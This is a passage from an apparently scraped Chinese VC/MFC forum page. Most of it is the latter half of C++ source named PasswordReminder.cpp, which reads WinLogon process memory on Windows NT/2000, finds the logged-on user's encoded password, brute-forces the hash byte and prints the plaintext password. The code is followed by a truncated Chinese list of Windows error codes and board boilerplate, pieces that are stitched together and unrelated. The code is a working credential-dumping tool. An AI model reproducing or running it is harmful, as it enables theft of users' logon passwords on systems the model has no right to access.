kernel object type process. if (QuerySystemInformationP->HandleType == 5) { PVOID DebugBufferP = pfnRtlCreateQueryDebugBuffer (0, 0); if (pfnRtlQueryProcessDebugInformation (QuerySystemInformationP->PID, 1, DebugBufferP) == 0) { PPROCESS_INFO_HEADER ProcessInfoHeaderP = (PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60); DWORD Count = ProcessInfoHeaderP->Count; PPROCESS_INFO ProcessInfoP = (PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER)); if (strstr (_strupr (ProcessInfoP->Name), "WINLOGON") != 0) { DWORD i; DWORD dw = (DWORD) ProcessInfoP; for (i = 0; i < Count; i++) { dw += sizeof (PROCESS_INFO); ProcessInfoP = (PPROCESS_INFO) dw; if (strstr (_strupr (ProcessInfoP->Name), "NWGINA") != 0) return (0); if (strstr (_strupr (ProcessInfoP->Name), "MSGINA") == 0) rc = QuerySystemInformationP->PID; } if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); HeapFree (GetProcessHeap (), 0, InfoP); return (rc); } } if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); } DWORD dw = (DWORD) QuerySystemInformationP; dw += sizeof (QUERY_SYSTEM_INFORMATION); QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw; } HeapFree (GetProcessHeap (), 0, InfoP); return (rc); } // FindWinLogon // // LocatePasswordPageWinNT函数用来在NT中找到用户密码 // BOOL LocatePasswordPageWinNT (DWORD WinLogonPID, PDWORD PasswordLength) { #define USER_DOMAIN_OFFSET_WINNT 0x200 #define USER_PASSWORD_OFFSET_WINNT 0x400 BOOL rc = FALSE; HANDLE WinLogonHandle = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, WinLogonPID); if (WinLogonHandle == 0) return (rc); *PasswordLength = 0; SYSTEM_INFO SystemInfo; GetSystemInfo (&SystemInfo); DWORD PEB = 0x7ffdf000; DWORD BytesCopied = 0; PVOID PEBP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SystemInfo.dwPageSize); if (!ReadProcessMemory (WinLogonHandle, (PVOID) PEB, PEBP, SystemInfo.dwPageSize, &BytesCopied)) { CloseHandle (WinLogonHandle); return (rc); } // Grab the value of the 2nd DWORD in the TEB. PDWORD WinLogonHeap = (PDWORD) ((DWORD) PEBP + (6 * sizeof (DWORD))); MEMORY_BASIC_INFORMATION MemoryBasicInformation; if (VirtualQueryEx (WinLogonHandle, (PVOID) *WinLogonHeap, &MemoryBasicInformation, sizeof (MEMORY_BASIC_INFORMATION))) if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT) && ((MemoryBasicInformation.Protect & PAGE_GUARD) == 0)) { PVOID WinLogonMemP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, MemoryBasicInformation.RegionSize); if (ReadProcessMemory (WinLogonHandle, (PVOID) *WinLogonHeap, WinLogonMemP, MemoryBasicInformation.RegionSize, &BytesCopied)) { DWORD i = (DWORD) WinLogonMemP; DWORD UserNamePos = 0; // The order in memory is UserName followed by the UserDomain. // 在内存中搜索UserName和UserDomain字符串 do { if ((wcsicmp (UserName, (wchar_t *) i) == 0) && (wcsicmp (UserDomain, (wchar_t *) (i + USER_DOMAIN_OFFSET_WINNT)) == 0)) { UserNamePos = i; break; } i += 2; } while (i < (DWORD) WinLogonMemP + MemoryBasicInformation.RegionSize); if (UserNamePos) { PENCODED_PASSWORD_INFO EncodedPasswordInfoP = (PENCODED_PASSWORD_INFO) ((DWORD) UserNamePos + USER_PASSWORD_OFFSET_WINNT); FILETIME LocalFileTime; SYSTEMTIME SystemTime; if (FileTimeToLocalFileTime (&EncodedPasswordInfoP->LoggedOn, &LocalFileTime)) if (FileTimeToSystemTime (&LocalFileTime, &SystemTime)) printf ("You logged on at %d/%d/%d %d:%d:%d\n", SystemTime.wMonth, SystemTime.wDay, SystemTime.wYear, SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond); *PasswordLength = (EncodedPasswordInfoP->EncodedPassword.Length & 0x00ff) / sizeof (wchar_t); // NT就是好,hash-byte直接放在编码中:) HashByte = (EncodedPasswordInfoP->EncodedPassword.Length & 0xff00) >> 8; RealPasswordP = (PVOID) (*WinLogonHeap + (UserNamePos - (DWORD) WinLogonMemP) + USER_PASSWORD_OFFSET_WINNT + 0x34); PasswordP = (PVOID) ((PBYTE) (UserNamePos + USER_PASSWORD_OFFSET_WINNT + 0x34)); rc = TRUE; } } } HeapFree (GetProcessHeap (), 0, PEBP); CloseHandle (WinLogonHandle); return (rc); } // LocatePasswordPageWinNT // // LocatePasswordPageWin2K函数用来在Win2K中找到用户密码 // BOOL LocatePasswordPageWin2K (DWORD WinLogonPID, PDWORD PasswordLength) { #define USER_DOMAIN_OFFSET_WIN2K 0x400 #define USER_PASSWORD_OFFSET_WIN2K 0x800 HANDLE WinLogonHandle = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, WinLogonPID); if (WinLogonHandle == 0) return (FALSE); *PasswordLength = 0; SYSTEM_INFO SystemInfo; GetSystemInfo (&SystemInfo); DWORD i = (DWORD) SystemInfo.lpMinimumApplicationAddress; DWORD MaxMemory = (DWORD) SystemInfo.lpMaximumApplicationAddress; DWORD Increment = SystemInfo.dwPageSize; MEMORY_BASIC_INFORMATION MemoryBasicInformation; while (i < MaxMemory) { if (VirtualQueryEx (WinLogonHandle, (PVOID) i, &MemoryBasicInformation, sizeof (MEMORY_BASIC_INFORMATION))) { Increment = MemoryBasicInformation.RegionSize; if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT) && ((MemoryBasicInformation.Protect & PAGE_GUARD) == 0)) { PVOID RealStartingAddressP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, MemoryBasicInformation.RegionSize); DWORD BytesCopied = 0; if (ReadProcessMemory (WinLogonHandle, (PVOID) i, RealStartingAddressP, MemoryBasicInformation.RegionSize, &BytesCopied)) { // 在WinLogon的内存空间中寻找UserName和DomainName的字符串 if ((wcsicmp ((wchar_t *) RealStartingAddressP, UserName) == 0) && (wcsicmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0)) { RealPasswordP = (PVOID) (i + USER_PASSWORD_OFFSET_WIN2K); PasswordP = (PVOID) ((DWORD) RealStartingAddressP + USER_PASSWORD_OFFSET_WIN2K); // Calculate the length of encoded unicode string. // 计算出密文的长度 PBYTE p = (PBYTE) PasswordP; DWORD Loc = (DWORD) p; DWORD Len = 0; if ((*p == 0) && (* (PBYTE) ((DWORD) p + 1) == 0)) ; else do { Len++; Loc += 2; p = (PBYTE) Loc; } while (*p != 0); *PasswordLength = Len; CloseHandle (WinLogonHandle); return (TRUE); } } HeapFree (GetProcessHeap (), 0, RealStartingAddressP); } } else Increment = SystemInfo.dwPageSize; // Move to next memory block. i += Increment; } CloseHandle (WinLogonHandle); return (FALSE); } // LocatePasswordPageWin2K // // DisplayPasswordWinNT函数用来在NT中解码用户密码 // void DisplayPasswordWinNT (void) { UNICODE_STRING EncodedString; EncodedString.Length = (WORD) PasswordLength * sizeof (wchar_t); EncodedString.MaximumLength = ((WORD) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t); EncodedString.Buffer = (PWSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, EncodedString.MaximumLength); CopyMemory (EncodedString.Buffer, PasswordP, PasswordLength * sizeof (wchar_t)); // Finally - decode the password. // Note that only one call is required since the hash-byte // was part of the orginally encoded string. // 在NT中,hash-byte是包含在编码中的 // 因此只需要直接调用函数解码就可以了 pfnRtlRunDecodeUnicodeString ((BYTE) HashByte, &EncodedString); printf ("The logon information is: %S/%S/%S.\n", UserDomain, UserName, EncodedString.Buffer); printf ("The hash byte is: 0x%2.2x.\n", HashByte); HeapFree (GetProcessHeap (), 0, EncodedString.Buffer); } // DisplayPasswordWinNT // // DisplayPasswordWin2K函数用来在Win2K中解码用户密码 // void DisplayPasswordWin2K (void) { DWORD i, Hash = 0; UNICODE_STRING EncodedString; EncodedString.Length = (USHORT) PasswordLength * sizeof (wchar_t); EncodedString.MaximumLength = ((USHORT) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t); EncodedString.Buffer = (PWSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, EncodedString.MaximumLength); // This is a brute force technique since the hash-byte // is not stored as part of the encoded string - :>(. // 因为在Win2K中hash-byte并不存放在编码中 // 所以在这里进行的是暴力破解 // 下面的循环中i就是hash-byte // 我们将i从0x00到0xff分别对密文进行解密 // 如果有一个hash-byte使得所有密码都是可见字符,就认为是有效的 // 这个算法实际上是从概率角度来解码的 // 因为如果hash-byte不对而解密出来的密码都是可见字符的概率非常小 for (i = 0; i <= 0xff; i++) { CopyMemory (EncodedString.Buffer, PasswordP, PasswordLength * sizeof (wchar_t)); // Finally - try to decode the password. // 使用i作为hash-byte对密文进行解码 pfnRtlRunDecodeUnicodeString ((BYTE) i, &EncodedString); // Check for a viewable password. // 检查解码出的密码是否完全由可见字符组成 // 如果是则认为是正确的解码 PBYTE p = (PBYTE) EncodedString.Buffer; BOOL Viewable = TRUE; DWORD j, k; for (j = 0; (j < PasswordLength) && Viewable; j++) { if ((*p) && (* (PBYTE)(DWORD (p) + 1) == 0)) { if (*p < 0x20) Viewable = FALSE; if (*p > 0x7e) Viewable = FALSE; //0x20是空格,0X7E是~,所有密码允许使用的可见字符都包括在里面了 } else Viewable = FALSE; k = DWORD (p); k++; k++; p = (PBYTE) k; } if (Viewable) { printf ("The logon information is: %S/%S/%S.\n", UserDomain, UserName, EncodedString.Buffer); printf ("The hash byte is: 0x%2.2x.\n", i); } } HeapFree (GetProcessHeap (), 0, EncodedString.Buffer); } // DisplayPasswordWin2K // end PasswordReminder.cpp
Microsoft Windows 系统错误代码简单分析:   0000 操作已成功完成。   0001 错误的函数。   0002 系统找不到指定的文件。   0003 系统找不到指定的路径。   0004 系统无法打开文件。   0005 拒绝访问。   0006 句柄无效。   0007 存储区控制块已损坏。   0008 可用的存储区不足, 无法执行该命令。   0009 存储区控制块地址无效。   0010 环境错误。   0011 试图使用不正确的格式加载程序。   0012 访问代码无效。   0013 数据无效。   0014 可用的存储区不足,无法完成该操作。   0015 系统找不到指定的驱动器。   0016 无法删除该目录。   0017 系统无法将文件移到其他磁盘驱动器上。   0018 没有其他文件。   0019 媒体写保护。   0020 系统找不到指定的设备。   0021 设备尚未准备好。   0022 设备无法识别该命令。   0023 数据错误(循环冗余检查)。   0024 程序发出命令,但是该命令的长度错误。   0025 驱动器在磁盘上无法定位指定的区域或磁道。   0026 无法访问指定的磁盘或软盘。   0027 驱动器找不到所请求的扇区。   0028 打印机缺纸。   0029 系统无法写入指定的设备。   0030 系统无法读取指定的设备。   0031 与系统连接的设备不能正常运转。   0032 其他进程正使用该文件,因此现在无法访问。   0033 另一进程已锁定该文件的某一部分,因此现在无法访问。   0034 驱动器中的软盘不正确。请将 %2 (卷标序列号: %3)插入驱动器 %1。   0036 打开共享的文件太多。   0038 已到达文件结尾。   0039 磁盘已满。   0050 不支持此网络请求。   0051 远程计算机无法使用。   0052 网络中存在重名。   0053 找不到网络路径。   0054 网络正忙。   0055 指定的网络资源或设备已不可用。   0056 已经达到网络命令的极限。   0057 网络适配器出现错误。   0058 指定的服务器无法执行所请求的操作。   0059 网络出现意外错误。   0060 远程适配器不兼容。   0061 打印机队列已满。   0062 服务器上没有存储等待打印的文件的空间。   0063 已经删除等候打印的文件。   0064 指定的网络名无法使用。   0065 拒绝访问网络。   0066 网络资源类型错误。   0067 找不到网络名。   0068 已超过本地计算机网络适配器卡的名称极限。   0069 已超过网络 BIOS 会话的极限。   0070 远程服务器已经暂停或者正在启动过程中。   0071 由于该计算机的连接数目已达到上限,此时无法再连接到该远程计算机。   0072 指定的打印机或磁盘设备已经暂停。   0080 该文件存在。   0082 无法创建该目录或文件。   0083 INT 24 失败。   0084 处理该请求的存储区不可用。   0085 正在使用该本地设备名。   0086 指定的网络密码不正确。   0087 参数错误。   0088 网络出现写入错误。   0089 此时系统无法启动其他进程。 0100 无法创建其他系统标志。   0101 属于其他进程的专用标志。   0102 标志已经设置, 无法关闭。   0103 无法再次设置该标志。   0104 中断时无法请求专用标志。   0105 此标志先前的所有权已终止。   0106 请将软盘插入驱动器 %1。   0107 后续软盘尚未插入,程序停止。   0108 磁盘正在使用或已由其他进程锁定。   0109 管道已经结束。   0110 系统无法打开指定的设备或文件。   0111 文件名太长。   0112 磁盘空间不足。   0113 没有其他可用的内部文件标识符。   0114 目标内部文件标识符不正确。   0117 该应用程序所运行的 IOCTL 调用

16,466

社区成员

发帖
与我相关
我的任务
社区描述
VC/MFC相关问题讨论
社区管理员
  • 基础类社区
  • Web++
  • encoderlee
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

        VC/MFC社区版块或许是CSDN最“古老”的版块了,记忆之中,与CSDN的年龄几乎差不多。随着时间的推移,MFC技术渐渐的偏离了开发主流,若干年之后的今天,当我们面对着微软的这个经典之笔,内心充满着敬意,那些曾经的记忆,可以说代表着二十年前曾经的辉煌……
        向经典致敬,或许是老一代程序员内心里面难以释怀的感受。互联网大行其道的今天,我们期待着MFC技术能够恢复其曾经的辉煌,或许这个期待会永远成为一种“梦想”,或许一切皆有可能……
        我们希望这个版块可以很好的适配Web时代,期待更好的互联网技术能够使得MFC技术框架得以重现活力,……

试试用AI创作助手写篇文章吧